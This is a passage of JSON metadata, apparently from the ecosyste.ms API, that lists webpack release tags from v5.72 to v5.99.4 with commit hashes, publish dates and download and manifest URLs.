ositories/webpack%2Fwebpack/tags/v5.99.4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.99.4/manifests"},{"name":"v5.99.3","sha":"2470d8e74c8b647203063826cae1ea5e691726a9","kind":"commit","published_at":"2025-04-08T14:49:22.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.99.3","html_url":"https://github.com/webpack/webpack/releases/tag/v5.99.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.99.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.99.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.99.3/manifests"},{"name":"v5.99.2","sha":"44da94f433c4adeb7ac56abc69df2b0f8a213486","kind":"commit","published_at":"2025-04-08T07:17:41.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.99.2","html_url":"https://github.com/webpack/webpack/releases/tag/v5.99.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.99.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.99.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.99.2/manifests"},{"name":"v5.99.1","sha":"2b2b705cc5c53594adf5adebca55f7273a1615c9","kind":"commit","published_at":"2025-04-07T22:34:00.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.99.1","html_url":"https://github.com/webpack/webpack/releases/tag/v5.99.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.99.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.99.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.99.1/manifests"},{"name":"v5.99.0","sha":"1bd06e333346656ef6542e36478f02055cab7369","kind":"commit","published_at":"2025-04-07T13:11:19.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.99.0","html_url":"https://github.com/webpack/webpack/releases/tag/v5.99.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.99.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.99.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.99.0/manifests"},{"name":"v5.98.0","sha":"f1bdec5cc70236083e45b665831d5d79d6485db7","kind":"tag","published_at":"2025-02-12T20:10:11.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.98.0","html_url":"https://github.com/webpack/webpack/releases/tag/v5.98.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.98.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.98.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.98.0/manifests"},{"name":"v5.97.1","sha":"3612d36e44bda5644dc3b353e2cade7fe442ba59","kind":"commit","published_at":"2024-12-05T14:17:42.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.97.1","html_url":"https://github.com/webpack/webpack/releases/tag/v5.97.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.97.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.97.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.97.1/manifests"},{"name":"v5.97.0","sha":"644f1d12716ba8f3c96d2efa279262560dd8c7fb","kind":"commit","published_at":"2024-12-03T11:06:30.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.97.0","html_url":"https://github.com/webpack/webpack/releases/tag/v5.97.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.97.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.97.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.97.0/manifests"},{"name":"v5.96.1","sha":"d4ced7322229c7d72a7a0d2ca955bdde0c910a0b","kind":"commit","published_at":"2024-11-01T10:59:24.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.96.1","html_url":"https://github.com/webpack/webpack/releases/tag/v5.96.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.96.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.96.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.96.1/manifests"},{"name":"v5.96.0","sha":"aff0c3ed2b31ed16ce8738e02f4b8f97966833f4","kind":"commit","published_at":"2024-10-31T22:01:08.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.96.0","html_url":"https://github.com/webpack/webpack/releases/tag/v5.96.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.96.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.96.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.96.0/manifests"},{"name":"v5.95.0","sha":"e20fd634fd24fab2c821a6e6114ace706ca052d0","kind":"commit","published_at":"2024-09-25T14:13:35.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.95.0","html_url":"https://github.com/webpack/webpack/releases/tag/v5.95.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.95.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.95.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.95.0/manifests"},{"name":"v5.94.0","sha":"eabf85d8580dfcb876b56957ba5488222a4f7873","kind":"commit","published_at":"2024-08-22T13:02:03.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.94.0","html_url":"https://github.com/webpack/webpack/releases/tag/v5.94.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.94.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.94.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.94.0/manifests"},{"name":"v5.93.0","sha":"277460b33bcc49c51acbbcd688672aa4ec685732","kind":"commit","published_at":"2024-07-11T18:28:51.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.93.0","html_url":"https://github.com/webpack/webpack/releases/tag/v5.93.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.93.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.93.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.93.0/manifests"},{"name":"v5.92.1","sha":"a82e0cd00e26d8452295f0d680417e4656a6d7cc","kind":"commit","published_at":"2024-06-19T16:19:03.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.92.1","html_url":"https://github.com/webpack/webpack/releases/tag/v5.92.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.92.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.92.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.92.1/manifests"},{"name":"v5.92.0","sha":"34e2561addb0f65a7a6fb0ce7ae1aea4cd1d599f","kind":"commit","published_at":"2024-06-11T14:50:48.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.92.0","html_url":"https://github.com/webpack/webpack/releases/tag/v5.92.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.92.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.92.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.92.0/manifests"},{"name":"v5.91.0","sha":"60daca54105f89eee45e118fd0bbc820730724ee","kind":"commit","published_at":"2024-03-20T16:11:48.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.91.0","html_url":"https://github.com/webpack/webpack/releases/tag/v5.91.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.91.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.91.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.91.0/manifests"},{"name":"v5.90.3","sha":"651b3d66d10d54da31d4cb7123ea74d10f1f5456","kind":"commit","published_at":"2024-02-19T12:32:11.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.90.3","html_url":"https://github.com/webpack/webpack/releases/tag/v5.90.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.90.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.90.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.90.3/manifests"},{"name":"v5.90.2","sha":"11c1be3d0838e8de31900aacabcd449e9da77eaf","kind":"commit","published_at":"2024-02-15T14:24:34.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.90.2","html_url":"https://github.com/webpack/webpack/releases/tag/v5.90.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.90.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.90.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.90.2/manifests"},{"name":"v5.90.1","sha":"08770761c8c7aa1e6e18b77d3deee8cc9871bd87","kind":"commit","published_at":"2024-02-01T17:09:26.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.90.1","html_url":"https://github.com/webpack/webpack/releases/tag/v5.90.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.90.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.90.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.90.1/manifests"},{"name":"v5.90.0","sha":"4a2662381ed8e6a9d849b494511459f5858d4e82","kind":"commit","published_at":"2024-01-24T13:09:25.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.90.0","html_url":"https://github.com/webpack/webpack/releases/tag/v5.90.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.90.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.90.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.90.0/manifests"},{"name":"v5.89.0","sha":"87660921808566ef3b8796f8df61bd79fc026108","kind":"tag","published_at":"2023-10-13T22:27:32.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.89.0","html_url":"https://github.com/webpack/webpack/releases/tag/v5.89.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.89.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.89.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.89.0/manifests"},{"name":"v4.47.0","sha":"dfffd6a241bf1d593b3fd31b4b279f96f4a4aab1","kind":"tag","published_at":"2023-09-06T17:15:50.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v4.47.0","html_url":"https://github.com/webpack/webpack/releases/tag/v4.47.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v4.47.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.47.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.47.0/manifests"},{"name":"v5.88.2","sha":"1f99ad6367f2b8a6ef17cce0e058f7a67fb7db18","kind":"tag","published_at":"2023-07-12T18:15:36.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.88.2","html_url":"https://github.com/webpack/webpack/releases/tag/v5.88.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.88.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.88.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.88.2/manifests"},{"name":"v5.88.1","sha":"6be4065ade1e252c1d8dcba4af0f43e32af1bdc1","kind":"tag","published_at":"2023-06-28T16:34:37.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.88.1","html_url":"https://github.com/webpack/webpack/releases/tag/v5.88.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.88.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.88.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.88.1/manifests"},{"name":"v5.88.0","sha":"1e18b1d1c74e26a84e9adee519c045e2d8ed40a4","kind":"tag","published_at":"2023-06-21T18:09:04.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.88.0","html_url":"https://github.com/webpack/webpack/releases/tag/v5.88.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.88.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.88.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.88.0/manifests"},{"name":"v5.87.0","sha":"8e0e0eb47d47fe33e4c9ef9bc455d9584f7ea92c","kind":"tag","published_at":"2023-06-14T18:24:58.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.87.0","html_url":"https://github.com/webpack/webpack/releases/tag/v5.87.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.87.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.87.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.87.0/manifests"},{"name":"v5.86.0","sha":"2dc8755dc40e24e3ba5760e96738b74990116711","kind":"tag","published_at":"2023-06-07T15:13:34.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.86.0","html_url":"https://github.com/webpack/webpack/releases/tag/v5.86.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.86.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.86.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.86.0/manifests"},{"name":"v5.85.1","sha":"f0f0dd548871566c77c69cdf3d00eaf0faf9a5cd","kind":"tag","published_at":"2023-06-05T14:30:11.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.85.1","html_url":"https://github.com/webpack/webpack/releases/tag/v5.85.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.85.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.85.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.85.1/manifests"},{"name":"v5.85.0","sha":"c80b069dca8eedebfa8ede9ce740891362fdb8bf","kind":"tag","published_at":"2023-05-31T19:20:20.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.85.0","html_url":"https://github.com/webpack/webpack/releases/tag/v5.85.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.85.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.85.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.85.0/manifests"},{"name":"v5.84.1","sha":"71d9a21c32974b5166f9ce2f5549849d0c7ad310","kind":"tag","published_at":"2023-05-25T18:35:39.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.84.1","html_url":"https://github.com/webpack/webpack/releases/tag/v5.84.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.84.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.84.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.84.1/manifests"},{"name":"v5.84.0","sha":"4d4caf13add84f996790e5bbdf79b66a548f8273","kind":"tag","published_at":"2023-05-24T17:00:45.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.84.0","html_url":"https://github.com/webpack/webpack/releases/tag/v5.84.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.84.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.84.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.84.0/manifests"},{"name":"v5.83.1","sha":"81c8fbde2e0e4b8d2e30a5109dedc082ef8c09dc","kind":"tag","published_at":"2023-05-17T20:22:27.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.83.1","html_url":"https://github.com/webpack/webpack/releases/tag/v5.83.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.83.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.83.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.83.1/manifests"},{"name":"v5.83.0","sha":"ccb3b860520c9472eff3d411a48105f882cf482a","kind":"tag","published_at":"2023-05-17T15:29:24.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.83.0","html_url":"https://github.com/webpack/webpack/releases/tag/v5.83.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.83.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.83.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.83.0/manifests"},{"name":"v5.82.1","sha":"a8fd8b7598e8a599871765e0167cacf8318944a9","kind":"tag","published_at":"2023-05-10T15:36:00.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.82.1","html_url":"https://github.com/webpack/webpack/releases/tag/v5.82.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.82.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.82.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.82.1/manifests"},{"name":"v5.82.0","sha":"1018ca80b31ea72436510398cca5be335b6ac81c","kind":"tag","published_at":"2023-05-03T17:03:17.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.82.0","html_url":"https://github.com/webpack/webpack/releases/tag/v5.82.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.82.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.82.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.82.0/manifests"},{"name":"v5.81.0","sha":"5c016a8ec1bbfd73a7fc20d4b474938e61ee3a57","kind":"tag","published_at":"2023-04-26T14:41:18.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.81.0","html_url":"https://github.com/webpack/webpack/releases/tag/v5.81.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.81.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.81.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.81.0/manifests"},{"name":"v5.80.0","sha":"9ac1728ee359efbbd1eb317f4a12c0f8136a690e","kind":"tag","published_at":"2023-04-19T16:56:31.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.80.0","html_url":"https://github.com/webpack/webpack/releases/tag/v5.80.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.80.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.80.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.80.0/manifests"},{"name":"v5.79.0","sha":"ecdcc1a1d02a3097acb9ebc0896365ae1f4d25e2","kind":"tag","published_at":"2023-04-12T15:12:33.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.79.0","html_url":"https://github.com/webpack/webpack/releases/tag/v5.79.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.79.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.79.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.79.0/manifests"},{"name":"v5.78.0","sha":"e51f8347026588c90f9bd91681597e97f24f40c9","kind":"tag","published_at":"2023-04-05T18:09:33.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.78.0","html_url":"https://github.com/webpack/webpack/releases/tag/v5.78.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.78.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.78.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.78.0/manifests"},{"name":"v5.77.0","sha":"263f29189060529198b7ab4dbddfd2dca46bd96e","kind":"tag","published_at":"2023-03-29T14:19:20.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.77.0","html_url":"https://github.com/webpack/webpack/releases/tag/v5.77.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.77.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.77.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.77.0/manifests"},{"name":"v5.76.3","sha":"8ac9616280aebfb61ae7484f06ad1979d73e6a56","kind":"tag","published_at":"2023-03-22T14:59:03.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.76.3","html_url":"https://github.com/webpack/webpack/releases/tag/v5.76.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.76.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.76.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.76.3/manifests"},{"name":"v5.76.2","sha":"dbf7bf39ab96e1462603435c150d601bb69ebe4e","kind":"tag","published_at":"2023-03-15T15:00:55.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.76.2","html_url":"https://github.com/webpack/webpack/releases/tag/v5.76.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.76.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.76.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.76.2/manifests"},{"name":"v5.76.1","sha":"21be52b681c477f8ebc41c1b0e7a7a8ac4fa7008","kind":"commit","published_at":"2023-03-10T22:59:46.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.76.1","html_url":"https://github.com/webpack/webpack/releases/tag/v5.76.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.76.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.76.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.76.1/manifests"},{"name":"v5.76.0","sha":"97b1718720c33f1b17302a74c5284b01e02ec001","kind":"commit","published_at":"2023-03-08T17:17:42.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.76.0","html_url":"https://github.com/webpack/webpack/releases/tag/v5.76.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.76.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.76.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.76.0/manifests"},{"name":"v5.75.0","sha":"8241da7f1e75c5581ba535d127fa66aeb9eb2ac8","kind":"tag","published_at":"2022-11-09T15:27:26.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.75.0","html_url":"https://github.com/webpack/webpack/releases/tag/v5.75.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.75.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.75.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.75.0/manifests"},{"name":"v5.74.0","sha":"8f87b50dc7ac24eb5c91fd0d55a22e34e252863c","kind":"tag","published_at":"2022-07-25T08:00:03.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.74.0","html_url":"https://github.com/webpack/webpack/releases/tag/v5.74.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.74.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.74.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.74.0/manifests"},{"name":"v5.73.0","sha":"36051a5ca77b4fa33fac651e1af650c7b910a873","kind":"tag","published_at":"2022-06-02T11:24:52.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.73.0","html_url":"https://github.com/webpack/webpack/releases/tag/v5.73.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.73.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.73.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.73.0/manifests"},{"name":"v5.72.1","sha":"08ecfbbc035b12f2ed5c0b83b53011dfe57ae7c9","kind":"tag","published_at":"2022-05-10T10:41:34.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.72.1","html_url":"https://github.com/webpack/webpack/releases/tag/v5.72.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.72.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.72.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.72.1/manifests"},{"name":"v5.72.0","s